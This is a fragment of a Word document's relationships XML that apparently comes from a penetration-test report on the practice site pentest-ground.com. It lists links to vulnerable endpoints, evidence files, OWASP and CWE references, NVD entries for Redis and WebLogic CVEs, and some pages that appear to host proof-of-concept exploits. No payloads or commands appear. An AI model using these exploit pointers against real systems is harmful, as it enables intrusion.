Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/csrf/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/f363fa86a804f0f4.txt" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-2551" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/9954c913cf1f39cf.txt" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/3ac633c5d0e170e.txt" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/290bd460842eb6ee.txt" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/9b0ba2b65819942c.txt" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/c8700eb2a6e2f483.txt" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/setup.php" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-32627" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-24736" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/fi/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A1-Injection%202017" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/209.html" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/d002de8cc1d7ba74.txt" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/693.html" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/robots.txt" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/security-alerts/cpujan2020.html"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owasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/fi/" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/csrf/" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/phpinfo.php" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-32628" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-3647" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/2ea76d4745216eb7.txt" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A3-Injection%202021" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/xss" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A1-BrokenAccessControl%202021" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/693.html" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theregister.co.uk/2015/05/19/robotstxt/" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/neilzhang1/Chinese-Charts" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/5b65b2f91b0070fb.txt" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/8e222e86c8356d24.txt" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/e173c034868132c6.txt" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-32687" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-21839" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Command_Injection" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A1-BrokenAccessControl%202021" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/brute/" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/login.php" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/xss_s/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/771a9236377ced17.txt" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A4-InsecureDesign%202021" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pjgmonteiro/Pentest-tools" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-25155"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github.com/1n7erface/PocList" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/9ca58f763a0e0c39.txt" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/d7f1316959673875.txt" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A1-BrokenAccessControl%202021" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/290bd460842eb6ee.txt" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Referer_header:_privacy_and_security_concerns" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Referer_header:_privacy_and_security_concerns" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/security-alerts/cpujul2018.html" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-41099" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/security-alerts/cpujan2023.html" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-28856" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-14147" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/94.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/fi/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/693.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/180e0e73ec1909a3.txt" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/HttpOnly" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/368d364d1e95ca86.txt" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/ab7169810a47d029.txt" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/ed6a36a23ef66892.txt" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/brute/" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/7f021dc42a1dc6a6.txt" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/php.ini" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-3276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ithub.com/hktalent/CVE-2020-2551" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redis.io/topics/security" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A1-Injection%202017" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A7-Cross-SiteScripting(XSS)%202017" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/sqli_blind/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/693.html" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A4-InsecureDesign%202021" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-32761" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2015-8080" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A1-Injection%202017" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/8ccbb2d12b028ca1.txt" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A7-Cross-SiteScripting(XSS)%202017" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.html" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/73ccb367045c1b28.txt" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/4b8e3cc9f8dd8547.txt" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-24834" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A3-Injection%202021" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A3-Injection%202021" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/a4f2dfce328661d6.txt" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/614.html" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nginx.org/en" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0543" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-31294" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-3470" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A3-Injection%202021" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A3-Injection%202021" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/d5998a8364de77.txt" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A10-Server-SideRequestForgery%202021" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/209.html" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/brute/" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/phpinfo.php" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-24735" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/security-alerts/cpuoct2020.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/exec/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/xss_r/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/693.html" TargetMode="External"/><Relationship Id="rId60" 